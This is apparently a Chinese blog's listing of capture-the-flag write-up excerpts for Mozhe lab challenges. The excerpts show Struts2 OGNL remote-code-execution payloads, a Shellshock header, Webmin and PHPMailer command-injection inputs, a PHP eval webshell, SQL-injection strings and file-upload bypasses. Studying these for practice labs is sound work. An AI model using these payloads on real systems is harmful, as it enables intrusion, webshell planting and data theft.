![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
做题记录
铁锤2号
干啥啥不会~
展开
-
kali linux 2022修改root密码
新版本的kali linux不再是root/toor的默认账户和密码,而是变成了kali/kali。但是有些时候需要使用root进行操作,可以使用以下方法修改root账户的密码打开终端,然后输入sudo passwd root回车后输入原来kali账户的密码(登录是什么账户就输入什么账户的密码),再输入需要设定的root的密码(linux默认密码输入是不显示的)登录试试修改成功...原创 2022-03-14 20:59:41 · 12722 阅读 · 2 评论 -
墨者SQL手工注入漏洞测试(MongoDB数据库)题解
题目的环境是Nginx+PHP+MongoDB。并且给了如下代码在题目的考察知识点方面,说到了MD5值。首先我们来打开链接,发现是用户登录界面(如果不是请稍等一会),然后和往常一样,点击那个通知,发现id的信息我们读一下代码,在query这个部分,把id插入后,直接返回了查询的data。用户输入的id的值没有经过任何转义就直接插入数据库中执行,在这个地方我们可以将id的值为1'});这样查询语句就变成了db.notice.find({'id':'1'})'})能看出后面的部分被过滤了原创 2022-02-12 20:50:52 · 1837 阅读 · 0 评论 -
墨者CMS系统漏洞分析溯源(第4题)题解
打开给的链接的页面,能发现是aspcms,还给了一个登录框通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user对密码进行一原创 2022-01-28 21:12:59 · 1077 阅读 · 0 评论 -
墨者CMS系统漏洞分析溯源(第9题)题解
打开靶场的链接,能发现这是discuz7.2去搜搜看有没有相关的信息,结果发现了一个discuz7.2的注入漏洞,而且可以getshell。使用的脚本如下:#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*- # author iswin import sysimport hashlibimport timeimport mathimport base64i原创 2022-01-16 17:28:03 · 522 阅读 · 0 评论 -
墨者PHP代码分析溯源(第4题)题解
首先打开页面,有个提示,而且还有段代码仔细看下这段代码<?phpeval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));?>能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev原创 2022-01-16 15:25:29 · 606 阅读 · 0 评论 -
墨者命令注入执行分析题解
首先是给了一个采购平台的页面,但是其实是一个带ping功能的页面输入127.0.0.1后点击ping进行抓包试试能看的出来分别提交了ip和命令,那么很明显我们可以尝试修改命令然后执行试试,修改为ls试试发现好像没啥用。那我们再修改下ip试试一片黑,没反应。其实要是在网页上输入,会发现如果不是ip,页面会弹出对话框说不是ip。我们不修改后面提交的命令,直接在ip后面添加命令试试发现能执行,我们cat一下这个key的文件看看还是一片黑,极有可能是过滤了空格字符,我们使用其他的字符代原创 2022-01-16 14:41:54 · 458 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-037)复现题解
也还是继续找poc,我们使用以下poc#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#process=@java.lang.Runtime@getRuntime().exec(#parameters.command[0]),#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()),@org.apache.commons.io.IOUtils@原创 2022-01-15 18:32:58 · 810 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-032)复现题解
通过以下链接,能查到s2-032的漏洞信息,我们按照这个指导进行。https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md首先对访问的页面进行抓包,然后填入以下pocindex.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@g原创 2022-01-15 16:17:26 · 2665 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-029)复现题解
首先打开页面,能看到有个让提交东西的框,通过代码能看到,这个框我们没法填入东西,所以自然而然的想法是在链接中直接添加通过在网上寻找poc,我们可以使用如下poc?message=(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptPropertie原创 2022-01-15 16:04:44 · 437 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-019)复现题解
首先访问以下链接,然后对页面进行抓包http://219.153.49.228:43023/showcase.action抓包后,使用以下poc?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.S原创 2022-01-15 15:40:06 · 1051 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-013)复现题解
首先查找到漏洞的相关利用信息,链接如下:https://vulhub.org/#/environments/struts2/s2-013/能看到poc如下:?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStrea原创 2022-01-15 15:15:30 · 1530 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-009)复现题解
一共提供了五个链接,每个都点击一下,发现第五个有点特别,点击进去,链接变成了219.153.49.228:45832/ajax查找漏洞相关的信息,找到一下链接:https://github.com/vulhub/vulhub/blob/master/struts2/s2-009/README.zh-cn.md按照链接的指引,我们能找到这个下面还有个页面,访问如下地址:http://219.153.49.228:45832/ajax/example5.action出现如下页面接着就是找原创 2022-01-15 14:45:32 · 738 阅读 · 1 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-008)复现题解
我们先查询一下这个漏洞的相关信息,链接如下:https://github.com/vulhub/vulhub/blob/master/struts2/s2-008/README.zh-cn.md可以发现是直接在url后面添加相应的poc就会被执行,上面链接提供的不太行,主要似乎是弹出计算器的,我们使用如下的poc,由于这类题目的key都是在key.txt中,我们直接上手拿到key吧,也不用ls一步步看了。如果需要的话,也可替换相应的cat /key.txt命令为ls查看。debug=command&a原创 2022-01-15 13:43:04 · 721 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-005)复现题解
这题本来想自己手动来解决,不使用工具,奈何网上找的poc都没法用,然后我就想用工具然后wireshark抓包后重放不就行了,结果还是失败了,如果有哪位同学弄好了,希望能评论下,poc该如何使。使用了wiresharke抓包后能看到红色中间部分的post数据包,但是放到bp中又不行,待我后面来研究下。直接上工具:直接拿到key了。工具可以在这里下载:http://k8gege.org/p/ab3e87f7.html不保证安全性,虽然我自己用了。...原创 2022-01-12 15:38:18 · 486 阅读 · 0 评论 -
墨者Tomcat 远程代码执行漏洞利用(第1题)题解
查找了下,这题似乎是CVE-2017-12615,具体链接参考:https://vulhub.org/#/environments/tomcat/CVE-2017-12615/首先我们对页面进行抓包原创 2022-01-12 13:34:48 · 349 阅读 · 0 评论 -
墨者Webmin未经身份验证的远程代码执行题解
先随便输入账号密码,然后抓包将上图的post部分修改为password_change.cgi将提交的数据部分修改为user=hhhh&pam=1&expired=2&old=cat /key.txt&new1=1111&new2=1111一直forward拿到key原创 2022-01-11 20:35:36 · 423 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-016)题解
在网上找了一下s2-106的漏洞情况,参考链接如下:https://www.jianshu.com/p/de165430e8a8在这个链接的最后,我们知道对漏洞进行验证的方法,就是在链接的最后添加相应的表达式 (这类表达式似乎有相同的名字)。针对这题,我们可以在后面添加index.action?redirect%25{3*4}即完整链接为http://219.153.49.228:48753/index.action?redirect:%25%7B3*4%7D注意后面的链接要进行编码处理按下原创 2022-01-11 20:20:01 · 972 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-015)题解
这题在网上搜索后,发现是这么进行操作的首先在地址后面添加${1+2}.action即访问http://219.153.49.228:43186/${1+2}.action发现存在回显然后我们构造以下信息,访问当前的文件夹,发现key.txt%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDecla原创 2022-01-08 20:30:07 · 2615 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-004)复现题解
点开链接,页面上说了一句话,大概意思说key就是在这个页面中,记住这句话。首先看一下提供的这个链接,大概翻译下是这样的意思就是说存在目录遍历漏洞,可以通过类似xxx.com/struts/…%252f的编码方式访问文件。这个%252f是啥呢,就是%2f编码的结果,%2f又是啥呢,就是反斜杠。比如我们在linux中访问目录就可以用cd ../../所以这个漏洞的意思就是,反斜杠会经过两次编码,然后造成目录的遍历。比如我们读取…/name目录下面的文件,就会变成…%252fname。我们继续输原创 2022-01-08 20:12:55 · 1138 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-007)复现题解
用户邮箱随便输,然后在年龄那一栏填入’+(1+1)+’,点击登录,能发现回显了11接着利用以下代码,ls查看有哪些文件'+ (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java.lang.Boolean(“false”),#context[“xwork.MethodAccessor.denyMethodExecution”]=#foo,@org.apache.commons.io.IOUtils@toString(@java.la原创 2022-01-07 20:58:10 · 954 阅读 · 0 评论 -
墨者Apache Struts2远程代码执行漏洞(S2-001)题解
这题明确说了是什么漏洞,咱们在网上找利用即可,并且参考链接中也提供了相应的信息官方这个说明说,在表单中填入%{1+1}如果回显为2的话,说明存在这种漏洞,最后我们测试发现,在密码中输入这个式子会回显为2,说明存在这个漏洞,其中的账号随便输接着拿下面这个exp直接获取到key%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“cat”,"/key.txt"})).redirectErrorStream(true).start(),原创 2022-01-07 20:38:27 · 441 阅读 · 0 评论 -
墨者Bash漏洞分析溯源题解
这个漏洞是看别人的思路解出来的,因为在打开页面后,我扫描不出来其他东西,惭愧后台存在一个地址,是http://219.153.49.228:49581/cgi-bin/poc.cgi访问这个地址对着地址进行抓包将user-agent进行修改,修改为() { :;}; echo; /bin/ls /重放一下看下效果能看到读取出了目录的内容,我们直接读取key.txt,将user-agent修改为:() { :;}; echo; /bin/cat /key.txt。拿到key...原创 2022-01-07 20:07:48 · 374 阅读 · 0 评论 -
墨者PHPMailer远程命令执行漏洞溯源题解
打开环境后,给了一个页面,但是啥也没有,看不出来对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com在your message中填入一句话木马&原创 2022-01-07 19:40:56 · 459 阅读 · 0 评论 -
墨者Weblogic任意文件上传漏洞复现第一题题解
打开靶场,注意这个地方给了账号密码点击进入页面好家伙,直接404(当然是假的)我们用dirsearch扫描下有啥有一个console,我们去打开然后用才开始提供的账户密码登录进去,像这样我们去找找weblogic的任意文件上传漏洞看看,vulhub上有https://vulhub.org/#/environments/weblogic/CVE-2018-2894/直接按照这个步骤进行就可以了。后面操作可以看这篇https://blog.csdn.net/yoyoko_chan/ar原创 2021-12-31 18:55:52 · 460 阅读 · 1 评论 -
墨者WebShell文件上传分析溯源(第2题)题解
打开靶场后,能发现是让扫描一下后台,上dirsearch来试试能看到有个upload的后台,访问试试这个页面会从upload.php跳转到upload1.php点击确定后会再跳转到upload2.php上。这个跳转是通过什么实现的呢?我们通过bp抓包后然后看下是什么情况看的出是通过js进行跳转的,我们直接在浏览器中禁止js跳转,设置位置如下图然后我们退出,重新访问upload,能看到上传点了上传一个php的木马但是到这,出现问题了,我们上传的文件去哪了呢?看了题解后,发现是通过原创 2021-12-31 18:29:17 · 515 阅读 · 0 评论 -
墨者WebShell文件上传漏洞分析溯源(第5题)题解
点击访问后台,能找到一个后台登录的页面这个地方可以输入几个密码试试,发现是账号以及密码都是admin。(其实应该爆破的,爆破方法另写一篇)使用admin登录后进入后台点开文章管理,点击添加文章能从页面上看出来,这是一个asp的页面,我们上传一个asp木马。但是我们首先将其命名为xxx.jpg,然后点击提交后,能看到上传的位置:记住这段位置,点击数据备份点击备份数据能看到这个位置,我们使用蚁剑访问翻到如图位置,拿到key...原创 2021-12-29 20:32:27 · 516 阅读 · 0 评论 -
墨者WebShell文件上传漏洞分析溯源(第4题)题解
首先还是上传一个文件看下网站是什么代码,不出意外,还是PHP题目中提及了使用MIME相关的内容,估计是通过content-type来的,我们可以直接使用bp拦截后修改即可,将原来的muma.jpg修改为如下:点击上传,成功使用蚁剑连接拿到key...原创 2021-12-28 21:04:04 · 236 阅读 · 0 评论 -
墨者WebShell文件上传漏洞分析溯源(第3题)题解
首先上来看下网站跑的是什么代码,上传一张dalao.jpg,能看到网站是php写的准备好php一句话木马<?php @eval($_POST['woshimuma']); ?>接着,经过测试发现,是判断文件头,我们使用bp在php木马的图片的内容前面添加GIF98a,如图发送上去,使用蚁剑连接过去连接上去,拿到key...原创 2021-12-28 20:37:51 · 385 阅读 · 1 评论 -
墨者WebShell文件上传漏洞分析溯源(第2题)题解
这题题干说的很清楚,js绕过,所以后面做题从这个方面考虑首先我们要判断网页是什么代码,以便准备好代码先随便上传一个文件,发现是php那我们准备好php一句话木马<?php @eval($_POST['woshimuma']);?>引号括起来的就是连接的密码。接着我们通过按下F12观察下页面的代码很明显存在过滤,这时我们可以采取两种方法,第一种是使用bp修改,第二种是修改前端的判断函数。以bp修改为例子往下做点击上传,然后使用bp拦截后修改为php上传过去上传成功原创 2021-12-28 20:21:53 · 454 阅读 · 0 评论 -
墨者WebShell文件上传漏洞分析溯源(第1题)题解
打开页面,是一个上传的页面正常上传png看行不行上传是没问题的那么测试一下bp抓包后修改为php看看不给上传那改成php3试试成功蚁剑连接看看拿到key原创 2021-12-24 21:03:14 · 327 阅读 · 0 评论 -
墨者内部文件上传系统漏洞分析溯源题解
题目是一个上传的功能,要求找到key先正常上传一个文件看看能看出来这是一个asp的网站,iis6.0存在一个文件解析漏洞,在xxx.asp文件夹下面的任何文件格式都会按照asp的格式执行,比如xxx.asp/1.jpg就会将这和1.jpg按照asp格式执行。既然如此,我们可以整个asp的一句话木马将其命名为q.txt后上传,然后使用burpsuite抓包,修改以下地方为1.asp然后上传上传成功后用蚁剑进行连接然后连接上去,拿到key参考:https://zhuanlan.z原创 2021-12-23 20:42:11 · 608 阅读 · 0 评论 -
墨者SQL注入漏洞测试(delete注入)
这题是看了别人的思路才知道的,还是要多加学习呀。首先是界面点进去后,点击留言发现会留言在界面上,我一直以为这个框子存在注入。结果不是的。正确的姿势是留言后点击鼠标放在删除按钮上会在左下角出现删除的链接,其实想想也是,写入应该是insert注入才对啊。那么我们是可以直接在链接上进行测试的id=1 and 1=1--+试试1=1和1=2测试后,发现是存在注入的,那么我们就从报错开始。id=1 and (updatexml(1,concat(0x7e,(select database()),0原创 2021-12-14 21:14:57 · 437 阅读 · 1 评论 -
墨者SQL注入漏洞测试(报错盲注)题解
按照题目意思,就是报错注入了,直接上来测试,看下怎么闭合能发现可以直接使用1’闭合掉直接闭合后,上报错函数从sqliliabs注入天书中选取几个报错注入的方法供大家参考1:http://127.0.0.1/sqllib/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by原创 2021-12-13 21:05:56 · 569 阅读 · 0 评论 -
墨者SQL注入漏洞测试(时间盲注)题解
解法一:剑走偏锋首先我们拿到网址后,第一个事就是加上type后测试下好小子,竟然回显?那我就不客气了直接看下数据库爆表type=group_concat(table_name) from information_schema.tables where table_schema=‘pentesterlab’–+爆表中的列,先测试下usertype=group_concat(column) from information_schema.columns where table_name=‘f原创 2021-12-12 15:20:20 · 1034 阅读 · 0 评论 -
墨者SQL注入漏洞测试(登录绕过)题解
登录绕过一般的语法格式如下select username,password from table where username='admin' and password='password'这种绕过很简单,如果我们在将用户名的输入填写为admin'#那么上面的语法格式就会变成select username,password from table where username='admin'#' and password='password'可以很明显的看到后面的语句都被注释了,直接就获取了原创 2021-12-12 13:08:32 · 945 阅读 · 0 评论 -
墨者SQL注入漏洞测试(布尔盲注)题解
题目明说是布尔盲注,所以直接通过if函数进行注入即可先猜测下数据库的长度id=1 and 1=if(lenfth(database())=10,1,2)能看出来,数据库的长度是10,接着猜数据库的名称,直接添加substr截取一位一位猜,最后猜出来数据库的名称是stromgroupid=1 and 1=if(substr(database(),1,1)=‘s’,1,2)接着猜库中包含的表有哪些,这个真的是手动搞了一个小时id=1 and 1=if(substr((select table_n原创 2021-12-11 21:16:31 · 471 阅读 · 0 评论 -
墨者SQL注入实战-MySQL题解
解题方向上明说了是base64编码,通过链接发现id后面的值确实被加密了,通过base64解码看看base64编码解码对id后面的值进行了加密,那么好办了,我们先猜测列的数量id=1 order by 1对id后面的值进行base64加密一直测试发现等于3会报错,那么说明有两列。先爆库看看 -1 union select database(),2当前的库是test,我们直接看看这个库中有哪些表-1 union select group_concat(table_name),2 fro原创 2021-12-11 16:52:39 · 576 阅读 · 0 评论 -
墨者-SQL过滤字符后手工注入漏洞测试(第1题)题解
这题和以前的简单题目一样,看题目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉题目给了误解,没有说准确,题目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下url16进制加密下面开始正式步骤:首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进原创 2021-12-10 21:09:02 · 835 阅读 · 0 评论